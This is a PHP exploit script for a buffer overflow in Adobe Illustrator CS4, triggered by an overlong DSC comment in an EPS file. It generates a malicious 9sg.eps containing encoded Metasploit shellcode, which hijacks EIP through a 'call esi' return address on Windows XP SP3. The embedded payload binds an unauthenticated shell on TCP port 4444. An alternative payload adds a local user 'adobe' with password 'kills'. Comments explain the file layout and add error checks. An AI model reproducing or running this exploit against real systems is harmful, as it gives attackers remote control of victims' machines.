<?php
/*
Adobe Illustrator CS4 (V14.0.0) Encapsulated Postscript (.eps)
overlong DSC Comment Buffer Overflow Exploit
by Nine:Situations:Group::pyrokinesis
site: http://retrogod.altervista.org/
An overlong DSC comment (more than 42000 bytes) results in a
direct EIP overwrite.
The exception is first-chance, so the application does not crash.
At the moment of the redirection EAX and ESI are user-controlled.
The buffer ESI points into begins with '%' (it is the start of the
next DSC comment), but as the byte pattern shows, that prefix is
effectively nop-equivalent.
Tested and working on Windows XP SP3.
The return address is a "call esi" from comctl32.dll on XP SP3
($_eip below); it is build-specific, so change it for any other
OS/DLL version -- all four bytes must be alphabetic.
Usage: php 9sg_illu.php  (this script; the archive may have renamed it)
then open the resulting 9sg.eps in Illustrator CS4 (double-click it).
The default payload binds a shell on TCP port 4444 with no
authentication; change the shellcode ($_scode_ii) for your needs.
*/
# windows/adduser - 446 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, USER=adobe, PASS=kills
#
# Alternative payload: Metasploit's windows/adduser (adds a local user
# "adobe" with password "kills", per the generator header above).
# NOT referenced by $_boom below -- the file is built with $_scode_ii;
# substitute this variable there to use it instead.
# The leading bytes (\xda\xc9\xd9\x74\x24\xf4\x59 ...) are not alphanumeric;
# they appear to be the alpha_mixed decoder's fnstenv-based GetPC stub,
# so only the decoder body onward is "alpha". The author's "must be
# alphabetic" note refers to the return address ($_eip); whether the
# DSC parser tolerates these leading bytes is not stated -- the author
# reports the exploit working with $_scode_ii, which has the same kind
# of stub.
$_scode_i = "\xda\xc9\xd9\x74\x24\xf4\x59\x49\x49\x49\x49\x49\x49\x49" .
"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" .
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42" .
"\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75" .
"\x4a\x49\x4b\x4c\x4a\x48\x47\x34\x43\x30\x43\x30\x45\x50" .
"\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55\x43\x48" .
"\x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f" .
"\x51\x30\x45\x51\x4a\x4b\x47\x39\x4c\x4b\x50\x34\x4c\x4b" .
"\x43\x31\x4a\x4e\x50\x31\x49\x50\x4a\x39\x4e\x4c\x4d\x54" .
"\x49\x50\x44\x34\x45\x57\x49\x51\x48\x4a\x44\x4d\x43\x31" .
"\x49\x52\x4a\x4b\x4a\x54\x47\x4b\x46\x34\x47\x54\x43\x34" .
"\x43\x45\x4a\x45\x4c\x4b\x51\x4f\x47\x54\x43\x31\x4a\x4b" .
"\x45\x36\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c" .
"\x45\x51\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x43\x31\x4a\x4b" .
"\x4d\x59\x51\x4c\x47\x54\x44\x44\x48\x43\x51\x4f\x50\x31" .
"\x4b\x46\x43\x50\x46\x36\x45\x34\x4c\x4b\x47\x36\x50\x30" .
"\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c\x4e\x4d" .
"\x4c\x4b\x42\x48\x43\x38\x4b\x39\x4a\x58\x4c\x43\x49\x50" .
"\x42\x4a\x46\x30\x42\x48\x4c\x30\x4d\x5a\x44\x44\x51\x4f" .
"\x45\x38\x4d\x48\x4b\x4e\x4c\x4a\x44\x4e\x51\x47\x4b\x4f" .
"\x4d\x37\x42\x43\x42\x4d\x42\x44\x46\x4e\x45\x35\x43\x48" .
"\x42\x45\x51\x30\x46\x4f\x45\x33\x47\x50\x42\x4e\x42\x45" .
"\x42\x54\x51\x30\x43\x45\x43\x43\x45\x35\x43\x42\x51\x30" .
"\x45\x31\x45\x34\x42\x4f\x42\x42\x43\x55\x47\x50\x42\x4b" .
"\x45\x39\x42\x4c\x42\x4c\x42\x53\x51\x30\x46\x4f\x51\x51" .
"\x47\x34\x50\x44\x51\x30\x47\x56\x51\x36\x51\x30\x42\x4e" .
"\x42\x45\x44\x34\x47\x50\x42\x4c\x42\x4f\x42\x43\x45\x31" .
"\x42\x4c\x43\x57\x43\x42\x42\x4f\x44\x35\x44\x30\x47\x50" .
"\x47\x31\x42\x44\x42\x4d\x42\x49\x42\x4e\x45\x39\x42\x53" .
"\x43\x44\x42\x52\x45\x31\x43\x44\x42\x4f\x44\x32\x44\x33" .
"\x51\x30\x45\x31\x45\x34\x42\x4f\x43\x52\x42\x45\x47\x50" .
"\x46\x4f\x47\x31\x47\x34\x51\x54\x45\x50\x41\x41";
# windows/shell_bind_tcp - 696 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444, RHOST=
#
# The payload actually embedded in $_boom: a bind shell listening on
# TCP 4444 (LPORT above). RHOST is empty, so presumably it binds on all
# interfaces, and a bind shell carries no authentication -- anyone who
# can reach port 4444 on the victim gets the shell. Use only on an
# isolated test host.
# As with $_scode_i, the first bytes (\x89\xe5\xda\xd0\xd9\x75\xf4\x5e ...)
# look like the encoder's non-alphanumeric GetPC stub; the author reports
# the exploit working with them in place. The header comment says it
# was generated with EXITFUNC=seh, which matches the "does not crash"
# claim above.
$_scode_ii = "\x89\xe5\xda\xd0\xd9\x75\xf4\x5e\x56\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x4b\x4c\x43\x5a\x4a\x4b\x50\x4d\x4d\x38" .
"\x4b\x49\x4b\x4f\x4b\x4f\x4b\x4f\x45\x30\x4c\x4b\x42\x4c" .
"\x46\x44\x51\x34\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c" .
"\x43\x35\x43\x48\x43\x31\x4a\x4f\x4c\x4b\x50\x4f\x42\x38" .
"\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a\x4b\x51\x59\x4c\x4b" .
"\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49\x50\x4a\x39" .
"\x4e\x4c\x4d\x54\x49\x50\x43\x44\x45\x57\x49\x51\x49\x5a" .
"\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47\x4b\x50\x54" .
"\x51\x34\x46\x48\x43\x45\x4b\x55\x4c\x4b\x51\x4f\x47\x54" .
"\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b" .
"\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x45\x53\x46\x4c\x4c\x4b" .
"\x4b\x39\x42\x4c\x47\x54\x45\x4c\x45\x31\x48\x43\x46\x51" .
"\x49\x4b\x45\x34\x4c\x4b\x50\x43\x50\x30\x4c\x4b\x51\x50" .
"\x44\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x51\x50" .
"\x43\x38\x51\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c" .
"\x50\x50\x4b\x4f\x48\x56\x45\x36\x50\x53\x43\x56\x45\x38" .
"\x50\x33\x46\x52\x45\x38\x44\x37\x43\x43\x47\x42\x51\x4f" .
"\x51\x44\x4b\x4f\x4e\x30\x45\x38\x48\x4b\x4a\x4d\x4b\x4c" .
"\x47\x4b\x50\x50\x4b\x4f\x49\x46\x51\x4f\x4c\x49\x4a\x45" .
"\x45\x36\x4b\x31\x4a\x4d\x43\x38\x43\x32\x51\x45\x42\x4a" .
"\x45\x52\x4b\x4f\x48\x50\x45\x38\x4e\x39\x44\x49\x4b\x45" .
"\x4e\x4d\x46\x37\x4b\x4f\x48\x56\x50\x53\x46\x33\x51\x43" .
"\x51\x43\x46\x33\x51\x53\x46\x33\x51\x53\x46\x33\x4b\x4f" .
"\x4e\x30\x45\x36\x45\x38\x42\x31\x51\x4c\x45\x36\x46\x33" .
"\x4b\x39\x4d\x31\x4a\x35\x42\x48\x4e\x44\x44\x5a\x42\x50" .
"\x49\x57\x51\x47\x4b\x4f\x49\x46\x43\x5a\x44\x50\x50\x51" .
"\x51\x45\x4b\x4f\x48\x50\x42\x48\x49\x34\x4e\x4d\x46\x4e" .
"\x4d\x39\x51\x47\x4b\x4f\x48\x56\x51\x43\x51\x45\x4b\x4f" .
"\x48\x50\x42\x48\x4d\x35\x51\x59\x4b\x36\x51\x59\x50\x57" .
"\x4b\x4f\x4e\x36\x46\x30\x50\x54\x46\x34\x51\x45\x4b\x4f" .
"\x4e\x30\x4c\x53\x45\x38\x4d\x37\x43\x49\x48\x46\x44\x39" .
"\x50\x57\x4b\x4f\x4e\x36\x46\x35\x4b\x4f\x4e\x30\x43\x56" .
"\x42\x4a\x43\x54\x42\x46\x43\x58\x45\x33\x42\x4d\x4d\x59" .
"\x4d\x35\x43\x5a\x46\x30\x51\x49\x47\x59\x48\x4c\x4b\x39" .
"\x4d\x37\x43\x5a\x50\x44\x4d\x59\x4b\x52\x50\x31\x49\x50" .
"\x4c\x33\x4e\x4a\x4b\x4e\x47\x32\x46\x4d\x4b\x4e\x47\x32" .
"\x46\x4c\x4c\x53\x4c\x4d\x43\x4a\x46\x58\x4e\x4b\x4e\x4b" .
"\x4e\x4b\x43\x58\x42\x52\x4b\x4e\x48\x33\x44\x56\x4b\x4f" .
"\x44\x35\x47\x34\x4b\x4f\x48\x56\x51\x4b\x51\x47\x46\x32" .
"\x46\x31\x50\x51\x50\x51\x42\x4a\x45\x51\x50\x51\x50\x51" .
"\x51\x45\x50\x51\x4b\x4f\x4e\x30\x42\x48\x4e\x4d\x49\x49" .
"\x43\x35\x48\x4e\x51\x43\x4b\x4f\x49\x46\x43\x5a\x4b\x4f" .
"\x4b\x4f\x50\x37\x4b\x4f\x4e\x30\x4c\x4b\x46\x37\x4b\x4c" .
"\x4d\x53\x48\x44\x45\x34\x4b\x4f\x4e\x36\x50\x52\x4b\x4f" .
"\x4e\x30\x42\x48\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x50\x53" .
"\x4b\x4f\x4e\x36\x4b\x4f\x48\x50\x41\x41";
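# Return address that lands in EIP: 0x77416b57, a "call esi" inside
# comctl32.dll on Windows XP SP3 (per the header comment). pack('V')
# emits it little-endian, i.e. exactly the bytes "\x57\x6b\x41\x77"
# ("WkAw") the original spelled out by hand -- keeping the address as a
# single integer means the comment and the bytes cannot drift apart.
# The header says every byte of this address must be alphabetic (the
# reason is not stated; presumably the DSC-comment parser rejects or
# mangles other bytes). That constraint used to be enforced by nothing,
# so a swapped-in address with a non-letter byte produced a silently
# broken .eps. Check it here instead. The address is build-specific;
# any other OS/DLL version needs its own "call esi" (or equivalent).
$_eip = pack('V', 0x77416b57); //0x77416b57 alphabetic call esi, comctl32.dll
if (!ctype_alpha($_eip)) {
    fwrite(STDERR, "return address must be four alphabetic bytes, got " . bin2hex($_eip) . "\n");
    exit(1);
}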
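# The malicious EPS, assembled in file order:
#   0x00  "\xc5\xd0\xd3\xc6" -- matches the DOS EPS binary-header magic,
#         followed by what reads as PS-section offset 0x20 (= 32, which is
#         exactly where the "%!PS" text starts). The remaining length and
#         preview fields do not match this file's real size, so they look
#         copied from a genuine Illustrator export -- presumably the loader
#         only needs the magic and the PS offset. TODO confirm.
#   0x20  "%!PS-Adobe-3.1 EPSF-3.0" and the encoding line: benign DSC.
#   then  the overlong DSC comment: '%' + 41699 filler bytes, the 4-byte
#         return address ($_eip) at comment offset 41700, then 2291 more
#         filler bytes. Per the header comment this is what overwrites EIP;
#         the offsets were found by the author on XP SP3 and are not
#         validated here.
#   then  a "%Title:" line, the "%AAAAAAAA" landing pad the author says the
#         redirect (call esi) lands on -- 0x25 'A'x4 is `and eax, imm32` and
#         0x41 is `inc ecx` on x86, so it is harmless, not a true nop --
#         and $_scode_ii (the bind shell) immediately after it.
#   then  DSC trailer lines lifted from a real CS4 export so the file still
#         looks like a normal Illustrator EPS.
# $_scode_i (adduser) is defined above but not used here; swap it in for
# $_scode_ii to change the payload.
$_boom = "\xc5\xd0\xd3\xc6\x20\x00\x00\x00\x05\xc8\x04\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00%\xc8\x04\x00\xb5I\x01\x00\xff".
"\xff\x00\x00".
"%!PS-Adobe-3.1\x20EPSF-3.0\r\n".
"%ADO_DSC_Encoding:\x20Windows\x20Roman\r\n".
"%".
str_repeat("A", 41699).
$_eip.
str_repeat("A", 2291).
"%Title:\x20Untitled-1.eps\r\n".
"%AAAAAAAA". // we jump here, nop-equivalent
$_scode_ii.
": A\r\n".
"%%For:\x20alias\r\n".
"%%CreationDate:\x2011/27/2009\r\n".
"%%BoundingBox:\x200\x200\x20227\x20171\r\n".
"%%HiResBoundingBox:\x200\x200\x20226.5044\x20170.3165\r\n".
"%%CropBox:\x200\x200\x20226.5044\x20170.3165\r\n".
"%%LanguageLevel:\x202\r\n".
"%%DocumentData:\x20Clean7Bit\r\n".
"%ADOBeginClientInjection:\x20DocumentHeader\x20\"AI11EPS\"\r\n".
"%%AI8_CreatorVersion:\x2014.0.0\r".
"%AI9_PrintingDataBegin\r".
"%ADO_BuildNumber:\x20Adobe\x20Illustrator(R)\x2014.0.0\x20x367\x20R\x20agm\x204.4890\x20ct\x205.1541\r".
"%ADO_ContainsXMP:\x20MainFirst\r".
"%AI7_Thumbnail:\x20128\x2096\x208\r".
"%%BeginData:\x204096\x20Hex\x20Bytes\r".
"%0000330000660000990000CC0033000033330033660033990033CC0033FF\r\n";
# file_put_contents() returns false on failure and the byte count on
# success; the original ignored both, so an unwritable directory or a
# short write left no file (or a truncated one) without any message.
# Fail loudly instead. Note the file goes to the current directory and an
# existing 9sg.eps is silently overwritten, as before.
$_written = file_put_contents("9sg.eps", $_boom);
if ($_written === false || $_written !== strlen($_boom)) {
    fwrite(STDERR, "9sg.eps: write failed or short write\n");
    exit(1);
}
# closing ?> deliberately omitted: PHP-only file, nothing to emit after it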